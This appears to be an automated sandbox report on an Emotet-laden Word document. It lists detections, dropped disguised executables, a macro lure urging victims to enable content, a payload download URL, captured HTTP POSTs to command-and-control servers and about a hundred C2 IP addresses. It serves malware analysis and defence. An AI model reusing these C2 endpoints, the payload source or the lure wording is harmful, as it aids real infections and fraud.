Source: sample1.doc	Metadefender: Detection: 45%	Perma Link
Source: sample1.doc	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\Public\Ksh1.pdf

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sample1.doc

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 14.1.TSChannel.exe.39a0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.0.dhcpcmonitor.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 14.0.TSChannel.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 10.0.mmcshext.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 8.0.tmp_e473b4.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 10.1.mmcshext.exe.3980000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.1.dhcpcmonitor.exe.39e0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.0.adsmsext.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 11.1.ir50_qcx.exe.3980000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 9.1.normaliz.exe.3a10000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 15.0.qdvd.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 9.0.normaliz.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 11.0.ir50_qcx.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao
Source: 8.1.tmp_e473b4.exe.39b0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.1.adsmsext.exe.2ca0000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 14.1.TSChannel.exe.39a0000.2.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.0.msvcp120_clr0400.exe.400000.0.unpack	Avira: Label: TR/AD.Emotet.fao

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,	16_2_004725E0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00472230 CryptEncrypt,memcpy,CryptGetHashParam,CryptDestroyHash,CryptDuplicateHash,CryptExportKey,GetProcessHeap,RtlAllocateHeap,	16_2_00472230
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471FC0 CryptDestroyHash,CryptDuplicateHash,memcpy,	16_2_00471FC0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_00471FD8 CryptDestroyHash,	16_2_00471FD8

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_006438F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	8_2_006438F0
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	9_2_003F38F0
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	10_2_003F38F0
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_003338F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	11_2_003338F0
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	12_2_004F38F0
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_002938F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	13_2_002938F0
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Code function: 14_2_01C638F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	14_2_01C638F0
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Code function: 15_2_003F38F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	15_2_003F38F0
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Code function: 16_2_004738F0 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,	16_2_004738F0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe

Code function: 4x nop then push ebp

8_2_0041FA20

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49172 -> 177.130.51.198:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 177.130.51.198:80
Source: Malware configuration extractor	IPs: 91.121.87.90:8080
Source: Malware configuration extractor	IPs: 104.131.144.215:8080
Source: Malware configuration extractor	IPs: 188.226.165.170:8080
Source: Malware configuration extractor	IPs: 2.58.16.86:8080
Source: Malware configuration extractor	IPs: 79.133.6.236:8080
Source: Malware configuration extractor	IPs: 125.200.20.233:80
Source: Malware configuration extractor	IPs: 109.206.139.119:80
Source: Malware configuration extractor	IPs: 188.40.170.197:80
Source: Malware configuration extractor	IPs: 121.117.147.153:443
Source: Malware configuration extractor	IPs: 221.147.142.214:80
Source: Malware configuration extractor	IPs: 88.247.58.26:80
Source: Malware configuration extractor	IPs: 37.205.9.252:7080
Source: Malware configuration extractor	IPs: 213.165.178.214:80
Source: Malware configuration extractor	IPs: 27.83.209.210:443
Source: Malware configuration extractor	IPs: 24.231.51.190:80
Source: Malware configuration extractor	IPs: 192.210.217.94:8080
Source: Malware configuration extractor	IPs: 123.216.134.52:80
Source: Malware configuration extractor	IPs: 179.5.118.12:80
Source: Malware configuration extractor	IPs: 103.80.51.61:8080
Source: Malware configuration extractor	IPs: 172.96.190.154:8080
Source: Malware configuration extractor	IPs: 223.17.215.76:80
Source: Malware configuration extractor	IPs: 46.105.131.68:8080
Source: Malware configuration extractor	IPs: 116.91.240.96:80
Source: Malware configuration extractor	IPs: 118.243.83.70:80
Source: Malware configuration extractor	IPs: 190.117.101.56:80
Source: Malware configuration extractor	IPs: 103.229.73.17:8080
Source: Malware configuration extractor	IPs: 5.79.70.250:8080
Source: Malware configuration extractor	IPs: 172.105.78.244:8080
Source: Malware configuration extractor	IPs: 95.76.142.243:80
Source: Malware configuration extractor	IPs: 113.193.239.51:443
Source: Malware configuration extractor	IPs: 113.161.148.81:80
Source: Malware configuration extractor	IPs: 180.148.4.130:8080
Source: Malware configuration extractor	IPs: 172.193.79.237:80
Source: Malware configuration extractor	IPs: 42.200.96.63:80
Source: Malware configuration extractor	IPs: 110.37.224.243:80
Source: Malware configuration extractor	IPs: 212.198.71.39:80
Source: Malware configuration extractor	IPs: 185.80.172.199:80
Source: Malware configuration extractor	IPs: 153.229.219.1:443
Source: Malware configuration extractor	IPs: 162.144.145.58:8080
Source: Malware configuration extractor	IPs: 190.55.186.229:80
Source: Malware configuration extractor	IPs: 94.212.52.40:80
Source: Malware configuration extractor	IPs: 37.46.129.215:8080
Source: Malware configuration extractor	IPs: 82.78.179.117:443
Source: Malware configuration extractor	IPs: 58.27.215.3:8080
Source: Malware configuration extractor	IPs: 178.33.167.120:8080
Source: Malware configuration extractor	IPs: 190.164.135.81:80
Source: Malware configuration extractor	IPs: 73.100.19.104:80
Source: Malware configuration extractor	IPs: 157.7.164.178:8081
Source: Malware configuration extractor	IPs: 115.79.59.157:80
Source: Malware configuration extractor	IPs: 190.194.12.132:80
Source: Malware configuration extractor	IPs: 85.75.49.113:80
Source: Malware configuration extractor	IPs: 185.142.236.163:443
Source: Malware configuration extractor	IPs: 113.203.238.130:80
Source: Malware configuration extractor	IPs: 91.75.75.46:80
Source: Malware configuration extractor	IPs: 41.185.29.128:8080
Source: Malware configuration extractor	IPs: 185.208.226.142:8080
Source: Malware configuration extractor	IPs: 188.166.220.180:7080
Source: Malware configuration extractor	IPs: 109.13.179.195:80
Source: Malware configuration extractor	IPs: 91.83.93.103:443
Source: Malware configuration extractor	IPs: 190.151.5.131:443
Source: Malware configuration extractor	IPs: 203.153.216.178:7080
Source: Malware configuration extractor	IPs: 51.38.50.144:8080
Source: Malware configuration extractor	IPs: 36.91.44.183:80
Source: Malware configuration extractor	IPs: 78.186.65.230:80
Source: Malware configuration extractor	IPs: 180.23.53.200:80
Source: Malware configuration extractor	IPs: 73.55.128.120:80
Source: Malware configuration extractor	IPs: 75.127.14.170:8080
Source: Malware configuration extractor	IPs: 119.92.77.17:80
Source: Malware configuration extractor	IPs: 192.241.220.183:8080
Source: Malware configuration extractor	IPs: 120.51.34.254:80
Source: Malware configuration extractor	IPs: 202.29.237.113:8080
Source: Malware configuration extractor	IPs: 41.76.213.144:8080
Source: Malware configuration extractor	IPs: 195.201.56.70:8080
Source: Malware configuration extractor	IPs: 175.103.38.146:80
Source: Malware configuration extractor	IPs: 190.192.39.136:80
Source: Malware configuration extractor	IPs: 203.56.191.129:8080
Source: Malware configuration extractor	IPs: 180.21.3.52:80
Source: Malware configuration extractor	IPs: 50.116.78.109:8080
Source: Malware configuration extractor	IPs: 47.154.85.229:80
Source: Malware configuration extractor	IPs: 54.38.143.245:8080
Source: Malware configuration extractor	IPs: 43.255.175.197:80
Source: Malware configuration extractor	IPs: 60.125.114.64:443
Source: Malware configuration extractor	IPs: 8.4.9.137:8080
Source: Malware configuration extractor	IPs: 91.213.106.100:8080
Source: Malware configuration extractor	IPs: 116.202.10.123:8080
Source: Malware configuration extractor	IPs: 103.93.220.182:80
Source: Malware configuration extractor	IPs: 115.79.195.246:80
Source: Malware configuration extractor	IPs: 139.59.61.215:443
Source: Malware configuration extractor	IPs: 45.239.204.100:80
Source: Malware configuration extractor	IPs: 143.95.101.72:8080
Source: Malware configuration extractor	IPs: 198.20.228.9:8080
Source: Malware configuration extractor	IPs: 192.163.221.191:8080
Source: Malware configuration extractor	IPs: 139.59.12.63:8080
Source: Malware configuration extractor	IPs: 77.74.78.80:443
Source: Malware configuration extractor	IPs: 118.33.121.37:80
Source: Malware configuration extractor	IPs: 126.126.139.26:443
Source: Malware configuration extractor	IPs: 46.32.229.152:8080
Source: Malware configuration extractor	IPs: 74.208.173.91:8080
Source: Malware configuration extractor	IPs: 190.85.46.52:7080
Source: Malware configuration extractor	IPs: 37.187.100.220:7080

Connects to several IPs in different countries

Source: unknown

Network traffic detected: IP country count 38

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 91.121.87.90:8080

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.131.144.215 104.131.144.215
Source: Joe Sandbox View	IP Address: 143.95.101.72 143.95.101.72

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
Source: Joe Sandbox View	ASN Name: SURF-IDPTSurfindoNetworkID SURF-IDPTSurfindoNetworkID

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /43z7rPqPirmV4qB/AthcoPDmU/Q4ILc7kQKSHycUR/pIpU/8iSRPWx/wgrz9ygVvehFY9FxG0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.130.51.198/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------------fZX6grGG67bSvix2bq9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 177.130.51.198Content-Length: 4452Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /KFDwQljVkxD3/OOFcmzcP5LKdqC/7kx60YXntHFlDt/5Rmtlx5Mir4E2nTGMFj/vs6RDbQfHrygTYrI/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.87.90/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----------------F6CkwVxliFrUl7piUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.121.87.90:8080Content-Length: 4452Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 177.130.51.198
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.87.90

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52B8A12-B174-499E-B3BD-E7523F18DF93}.tmp

Jump to behavior

Source: unknown

Source: global traffic

Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: certutil.exe, 00000002.00000002.2219887563.0000000002130000.00000002.00000001.sdmp, tmp_e473b4.exe, 00000008.00000002.2257462460.0000000002E50000.00000002.00000001.sdmp, normaliz.exe, 00000009.00000002.2261625461.0000000003050000.00000002.00000001.sdmp, mmcshext.exe, 0000000A.00000002.2265977899.0000000002E80000.00000002.00000001.sdmp, ir50_qcx.exe, 0000000B.00000002.2270198814.0000000002EF0000.00000002.00000001.sdmp, dhcpcmonitor.exe, 0000000C.00000002.2274808207.0000000002F70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp	String found in binary or memory: https://pornthash.mobi/videos/tayna_tung
Source: certutil.exe, 00000002.00000002.2220502859.0000000002600000.00000004.00000001.sdmp	String found in binary or memory: https://pornthash.mobi/videos/tayna_tung%temp%/tmp_e473b4.exex

E-Banking Fraud:

Yara detected Emotet

Source: Yara match	File source: 0000000A.00000003.2260910791.0000000000688000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2274679265.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269436388.0000000000331000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289663022.00000000005B6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2274011391.00000000004F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2260946472.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330396700.00000000002B4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278477954.0000000000574000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2330617776.0000000000471000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265106835.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2289619290.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2269524139.0000000000504000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2265408389.0000000000548000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2273841914.00000000002F6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2265371977.0000000000686000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2279155029.00000000002B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255546226.0000000000641000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2284287661.00000000005B8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2282904583.0000000000274000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2286207050.0000000001C61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2256075266.0000000000658000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2255733615.0000000000926000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2278304115.0000000000291000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2269934201.00000000002F8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2261089149.0000000000614000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2289418364.00000000003F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2251551044.0000000000928000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.adsmsext.exe.5b8ab8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.tmp_e473b4.exe.9285b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.normaliz.exe.658540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.2f8598.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.ir50_qcx.exe.548548.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.640000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.TSChannel.exe.2b8550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.adsmsext.exe.5b8ab8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.tmp_e473b4.exe.9285b8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.qdvd.exe.5b8518.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.TSChannel.exe.1c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.dhcpcmonitor.exe.2f8560.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.mmcshext.exe.688500.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.qdvd.exe.5b8518.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.ir50_qcx.exe.548548.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.2f8560.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.688500.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.mmcshext.exe.3f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.dhcpcmonitor.exe.4f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.msvcp120_clr0400.exe.470000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.normaliz.exe.658540.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.msvcp120_clr0400.exe.2f8598.0.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe

Code function: 16_2_004725E0 CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptAcquireContextW,CryptGenKey,CryptCreateHash,GetProcessHeap,HeapFree,

16_2_004725E0

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000006.00000002.2250987083.000000000061D000.00000004.00000020.sdmp, type: MEMORY

Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable editing" from the yellow bar above. QNN q 2 Once you have enabled editing, please click
Source: Screenshot number: 4	Screenshot OCR: Enable content" on the yellow bar above. Em> "this document is completely safety to open Page: 1 o
Source: Document image extraction number: 0	Screenshot OCR: Enable editing' from the yellow bar 2 Once you have enabled editing, please click "Enable content'
Source: Document image extraction number: 0	Screenshot OCR: Enable content' on the yellow bar above. *this document is completely safety to open

Document contains an embedded VBA macro with suspicious strings

Source: sample1.doc	OLE, VBA macro line: Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
Source: sample1.doc	OLE, VBA macro line: Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\oleaccrc\TSChannel.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\iprtrmgr\qdvd.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\whhelper\msvcp120_clr0400.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\tmp_e473b4.exe	Code function: 8_2_00620400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	8_2_00620400
Source: C:\Windows\SysWOW64\mfcm140\normaliz.exe	Code function: 9_2_003E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	9_2_003E0400
Source: C:\Windows\SysWOW64\clip\mmcshext.exe	Code function: 10_2_00360400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	10_2_00360400
Source: C:\Windows\SysWOW64\regedt32\ir50_qcx.exe	Code function: 11_2_00320400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	11_2_00320400
Source: C:\Windows\SysWOW64\KBDNEPR\dhcpcmonitor.exe	Code function: 12_2_004E0400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	12_2_004E0400
Source: C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0\adsmsext.exe	Code function: 13_2_00280400 GetCurrentProcess,NtQueryInformationProcess,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetCurrentProcess,NtQueryInformationProcess,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,	13_2_00280400
